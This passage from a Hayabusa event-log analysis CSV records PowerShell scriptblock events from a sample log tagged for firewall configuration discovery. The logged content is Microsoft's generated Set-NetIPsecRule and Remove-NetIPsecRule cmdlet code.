($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings 
= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System 
Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,eterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue =,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, 